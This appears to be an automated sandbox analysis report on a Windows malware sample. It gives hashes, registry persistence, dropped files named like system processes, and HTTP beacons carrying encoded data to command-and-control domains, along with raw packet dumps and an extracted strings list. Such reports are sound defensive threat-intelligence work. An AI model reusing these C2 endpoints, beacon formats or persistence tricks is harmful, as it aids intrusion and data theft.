Analysis Date2014-08-25 10:17:12
MD5b96ccf3f0e9dd7f6401f87f56f706654
SHA138dcf22ea9cdedab7d2bbcf91003c67830afc8d3

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4a45a9a5331d0d84b97bb048cef0b272 sha1: 6d7206da34c2bb01aeba95a588996f20f0554ae9 size: 126464
Section.tls md5: 5495d207c1ae8bb35b2196053cfebeb4 sha1: 624f01d15013911c453e1d95f8872b54564c3127 size: 1536
Section.data md5: a7134af7827704baee3b645e34dcc4e7 sha1: 7c9ec511b6ef8c6f32512f06d74bd3e89b116b61 size: 70144
Section.reloc md5: 0606782405efd5e46d5ba152371e63f8 sha1: 12fbbec86bfa89a8f3559da8372844179c95f488 size: 1024
Timestamp2005-09-03 15:38:32
PEhash3695369412e0d0d2eb364ffc56aa7275ca6c12e7
IMPhash457f7fcf9e2f68a22b8f81f71f10ff5a

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{F053D246-5CC9-46E9-9C51-723D87E9990B}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwwwmediaportal.com
Winsock DNS127.0.0.1
Winsock DNShealthylifenow.com
Winsock DNScoolmediaportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNShealthylifenow.com
Type: A
208.109.208.147
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSwwwmediaportal.com
Type: A
128.199.187.239
DNScoolmediaportal.com
Type: A
HTTP GEThttp://healthylifenow.com/templates/7349/images/header_logo.jpg?v24=85&tq=gKZEtzycD5BgS7u9MfUaIrsY5ZfQh0UbCFGYWvZp%2FYu%2FBJ1YvYCFjEjxygyfg0mzPgu0%2BCBQwavhps9ugmv1yDmnUvs1LsOKf0qYNgIY8IuMysuIISDwbxcDFO4ZLlzoYKgNrQXKMqQLEQxtNllAIWuMuF8TJn%2BWkq4aAbWsIIAjHhulZk%2Btf6EL3chss5XbpcbI0KsIYpkejoM5Sa19KkEGJaOrbll%2FRoxevjCmlXkDBq0wiOz6weZHKIsYAxQLDVhkZu%2FMVYpaHyOSwHfr4upWkui7CmCGmsUia1MES1bseHBojOiZMdd59UZd
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP GEThttp://wwwmediaportal.com/blog/images/3521.jpg?v56=33&tq=gKZEtzyMv5rJqxG1J42pzMffBv0o0%2BjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 208.109.208.147:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 128.199.187.239:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f74656d 706c6174 65732f37   GET /templates/7
0x00000010 (00016)   3334392f 696d6167 65732f68 65616465   349/images/heade
0x00000020 (00032)   725f6c6f 676f2e6a 70673f76 32343d38   r_logo.jpg?v24=8
0x00000030 (00048)   35267471 3d674b5a 45747a79 63443542   5&tq=gKZEtzycD5B
0x00000040 (00064)   67533775 394d6655 61497273 59355a66   gS7u9MfUaIrsY5Zf
0x00000050 (00080)   51683055 62434647 5957765a 70253246   Qh0UbCFGYWvZp%2F
0x00000060 (00096)   59752532 46424a31 59765943 466a456a   Yu%2FBJ1YvYCFjEj
0x00000070 (00112)   78796779 6667306d 7a506775 30253242   xygyfg0mzPgu0%2B
0x00000080 (00128)   43425177 61766870 73397567 6d763179   CBQwavhps9ugmv1y
0x00000090 (00144)   446d6e55 7673314c 734f4b66 3071594e   DmnUvs1LsOKf0qYN
0x000000a0 (00160)   67495938 49754d79 73754949 53447762   gIY8IuMysuIISDwb
0x000000b0 (00176)   78634446 4f345a4c 6c7a6f59 4b674e72   xcDFO4ZLlzoYKgNr
0x000000c0 (00192)   51584b4d 71514c45 5178744e 6c6c4149   QXKMqQLEQxtNllAI
0x000000d0 (00208)   57754d75 4638544a 6e253242 576b7134   WuMuF8TJn%2BWkq4
0x000000e0 (00224)   61416257 73494941 6a486875 6c5a6b25   aAbWsIIAjHhulZk%
0x000000f0 (00240)   32427466 36454c33 63687373 35586270   2Btf6EL3chss5Xbp
0x00000100 (00256)   63624930 4b734959 706b656a 6f4d3553   cbI0KsIYpkejoM5S
0x00000110 (00272)   6131394b 6b45474a 614f7262 6c6c2532   a19KkEGJaOrbll%2
0x00000120 (00288)   46526f78 65766a43 6d6c586b 44427130   FRoxevjCmlXkDBq0
0x00000130 (00304)   77694f7a 3677655a 484b4973 59417851   wiOz6weZHKIsYAxQ
0x00000140 (00320)   4c445668 6b5a7525 32464d56 59706148   LDVhkZu%2FMVYpaH
0x00000150 (00336)   794f5377 48667234 7570576b 75693743   yOSwHfr4upWkui7C
0x00000160 (00352)   6d43476d 73556961 314d4553 31627365   mCGmsUia1MES1bse
0x00000170 (00368)   48426f6a 4f695a4d 64643539 555a6420   HBojOiZMdd59UZd 
0x00000180 (00384)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000190 (00400)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000001a0 (00416)   743a2068 65616c74 68796c69 66656e6f   t: healthylifeno
0x000001b0 (00432)   772e636f 6d0d0a41 63636570 743a202a   w.com..Accept: *
0x000001c0 (00448)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001d0 (00464)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a4f7a 3677655a 484b4973 59417851   ..Oz6weZHKIsYAxQ
0x00000140 (00320)   4c445668 6b5a7525 32464d56 59706148   LDVhkZu%2FMVYpaH
0x00000150 (00336)   794f5377 48667234 7570576b 75693743   yOSwHfr4upWkui7C
0x00000160 (00352)   6d43476d 73556961 314d4553 31627365   mCGmsUia1MES1bse
0x00000170 (00368)   48426f6a 4f695a4d 64643539 555a6420   HBojOiZMdd59UZd 
0x00000180 (00384)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000190 (00400)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000001a0 (00416)   743a2068 65616c74 68796c69 66656e6f   t: healthylifeno
0x000001b0 (00432)   772e636f 6d0d0a41 63636570 743a202a   w.com..Accept: *
0x000001c0 (00448)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001d0 (00464)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7635 363d3333   /3521.jpg?v56=33
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 4276306f   qxG1J42pzMffBv0o
0x00000040 (00064)   30253242 6a627776 67533931 37563635   0%2BjbwvgS917V65
0x00000050 (00080)   724a716c 4c666750 69575731 63672048   rJqlLfgPiWW1cg H
0x00000060 (00096)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x00000070 (00112)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000080 (00128)   3a207777 776d6564 6961706f 7274616c   : wwwmediaportal
0x00000090 (00144)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000000a0 (00160)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000000b0 (00176)   6f7a696c 6c612f32 2e300d0a 0d0a0a20   ozilla/2.0..... 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 484b4973 59417851   </html>.HKIsYAxQ
0x00000140 (00320)   4c445668 6b5a7525 32464d56 59706148   LDVhkZu%2FMVYpaH
0x00000150 (00336)   794f5377 48667234 7570576b 75693743   yOSwHfr4upWkui7C
0x00000160 (00352)   6d43476d 73556961 314d4553 31627365   mCGmsUia1MES1bse
0x00000170 (00368)   48426f6a 4f695a4d 64643539 555a6420   HBojOiZMdd59UZd 
0x00000180 (00384)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000190 (00400)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000001a0 (00416)   743a2068 65616c74 68796c69 66656e6f   t: healthylifeno
0x000001b0 (00432)   772e636f 6d0d0a41 63636570 743a202a   w.com..Accept: *
0x000001c0 (00448)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001d0 (00464)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   3c2f6874 6d6c3e0a 484b4973 59417851   </html>.HKIsYAxQ
0x00000140 (00320)   4c445668 6b5a7525 32464d56 59706148   LDVhkZu%2FMVYpaH
0x00000150 (00336)   794f5377 48667234 7570576b 75693743   yOSwHfr4upWkui7C
0x00000160 (00352)   6d43476d 73556961 314d4553 31627365   mCGmsUia1MES1bse
0x00000170 (00368)   48426f6a 4f695a4d 64643539 555a6420   HBojOiZMdd59UZd 
0x00000180 (00384)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000190 (00400)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000001a0 (00416)   743a2068 65616c74 68796c69 66656e6f   t: healthylifeno
0x000001b0 (00432)   772e636f 6d0d0a41 63636570 743a202a   w.com..Accept: *
0x000001c0 (00448)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000001d0 (00464)   6d6f7a69 6c6c612f 322e300d 0a0d0a     mozilla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.p.j
.
..U.
.
..n
>n
. .
<&...iM

080904b0
1.0.0.1
1927
&All Exit        Shift+C
&exit
FileVersion
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``* @?
`@*@@|
, `&@@
'$`@,@
!1HMT)
1{jL	y*@
21UpL:
21W%uYs
%2F6|D
2|"QR|GY
2Udr ``'
@@3$``:)
`3aK@f
3bMY_+
3eP@J<D
3G&Vm;
'3Od)y
)_3rk8
3\UsA9
` 3w{B
3y9~ej
44>xC0
4aLP][
	\[4OM
4On|zy
5 ;bW8
 5BYd!
;]5CNd2x
5:'/Gd
5(`@p)
5stbi5
5.@ X5
:!5*Y{
 >5ZVD
6Li:`;
7bj3Fi1
7c4>E0
>7E!1}
;7gjWrc
`%7mbq
)	7{<N
;,7t~z
#^8H$`
9	:8F}
9dxO.l
 9u17Ocg
9*WJy[
a0hy2nK
A,``5|
ADVAPI32.dll
A]Dz" 
 ;ae'S
|age2Od)
@<ahWT
a>iv$}
aklB)#
AK*slL
a"@ ;O
@As~g%`=W
A%T	4QC
<b,@ #
B6mh^"
b:a.H"
Bc34?J
BfIy_/
bj<?x?D
Bm\j|o
.!bPrZ(
b_qKC)
BU*@`r
^'c"``
C5WtOv#(
ckVx97`
Cl>'$@ px, 
CoCreateInstance
CopyFileW
&$cO	R,
CreateDirectoryExA
CreateEventW
CreateProcessW
``ctnRi
cXVwcVG
|CZpqj
>D.!asR
@.data
DeleteFileA
DeleteFileW
]DGCYb)
di_cb<g
Dm!6*@
Dm&` u
^dpN3j
dr4wx8:
d$tX;Ce
dW39R'<!
e!7byB
E_=f7+
efGnNa
E)%^lb
@@EMdD0
EnumResourceNamesW
=eO`A\
EP0z_~H:6
Eq	ah@
_Es8]w
-etyGc
`@]eZ=O
'f&=_(
%%F:+'
`F7&p6q
f8p`,``
@`FB=0_
Fc4;PE'r
fG~+"@
FindClose
FindFirstFileA
FindNextFileA
@%F-N{f
FOBKVxVx
'f.pEN
F)rw4T*
f%#Yc%
FY:"U-
FZ>J3# +
g0hegr
g7m5l4
@ ?^G8
G8N`n#
GetExitCodeThread
GetFileAttributesA
GetModuleBaseNameW
GetTempPathA
g#O:(@ 
G<)QB4
,}gr4U
GThY\h]a
g,Wi;*
gXRMtQ
h8E~Bldl
`H]8}Z&
Heap32ListNext
HeapSetInformation
HIo>_9;{
 hSbz^p`Z
HTiOoU
[HtoctV
 H=XU~
icM8<Zb
IIDFromString
`ijWtov
i`!LGVV
InterlockedCompareExchange
&I+U>1
/_I^UI+
`@{iY@
i(yx{	S
J3a5, 
@ jcIW
jcP*@ 
J_*_gFwk
j<-|Kc-
?Jtey6
jv1/aP+
jvvaZ.=
.Jw}K,V
JzlL"# 
KERNEL32.dll
+,%kj,
K<p<7]^&
kRC,Fmv
K%sM/~
>/k\|u
KuOP0]
kVe;A2
KvpF&O
Kw'Pd_
Kx&@ /$ 
@`{L[2SLjx$
-;la\'
l<|D'O
``lh_8s
LH,>P%M
Li"`@2
liHLei
L\l%Md
LoadLibraryExW
LoadLibraryW
LocalAlloc
LocalFree
L]ruA5
.lS_sU|p0
lstrcmpA
lstrcmpiA
lstrcmpiW
lstrlenA
lstrlenW
;+LuqW
l.``+W
lw]C"@`
[lzf>$` m9
LZUUg'
$ @!;)<M
\^!"M(
M9^.@`X
Mi*  #
mqVk^~
`MtAX0
MultiByteToWideChar
M|UMSm
M @ zLJ
` )N,`@
@ N%/0
N0'=Zc
 n3QIR
{?n4\>
Nl'CDK
nR=<5E
NxC;# 
`!o	$ 
;o\_.@
o<+3XM
ofUm[mX
%}Onw6
o;q0{;
@Oq1u)
OR	g'Y
ORxglZj
P( @:\
p&("bR
pEvdk[
=&@ P^G
P&  ko 
pM;/avp
PSAPI.DLL
``*`@pU)
*`@Q& 
q%1Fl0
Q=b^n/iBl
qMKi/;p
q/ovH}wdB
QtPtc&
qxik~)-^!
{r3{W78
R5uW:d&
r|}	Cl
RegCloseKey
RegCreateKeyA
RegCreateKeyExW
RegCreateKeyW
RegDeleteKeyW
RegDeleteValueW
RegEnumValueW
RegOpenKeyExA
RegOpenKeyExW
RegQueryValueExA
RegQueryValueExW
RegSetValueExA
.reloc
RemoveDirectoryA
RLa_7_
rmhJ3.d
&``\Rn
=_rO( 
R["Oed
`+<rpYC
@ R=:{q
R|VSh{
`.  ;S
SetFileAttributesA
SetProcessWorkingSetSize
S @ iO
+%)sL9
S.]Ujx
s+x\OWW"
t*`@"  
t& `{#
-=t	4uf
T6~}!(
TEOB)g
~T+gU 
 `TGW4
!This program cannot be run in DOS mode.
tj?Ew4y$`K{
TOxwS9x
!-tX|	e
T+xvFN
  TyFeJ
T~Z_.=
`{UDbX
=UGkS/
U#+Ho<
UjcO46
U;q81`
`@u.` R
UsitAm
`@V{#;
vbhP rOV
VL WF0K
V]MaOg
vpN 8S
-Vukvi
VYsu/Z
@@Vzbt
WideCharToMultiByte
woMOai
++^w{p
&|`W'S@
  wSrR
,``WtB
W;W$Nj
X%b" @
X!hI~Xu2
xPd9fnA
Xri&Pg
x>Ry+~
 `xwHrWRL
y'3tU#
Y[4%/,
Y5, @z
y8Cj7)
yb~zk)\^n
 @@yg2
YnEgrxp
& @{YU
Y;\Zc.
].`@Z_.
%+z26_5
Za7SPA
zBQfj`
z>G(v?
[ZJK2^o
&zjLfg
zmL&vA
z?[?O 
@ ]ZP%RO
zRtP+{D
ZzQ%4"8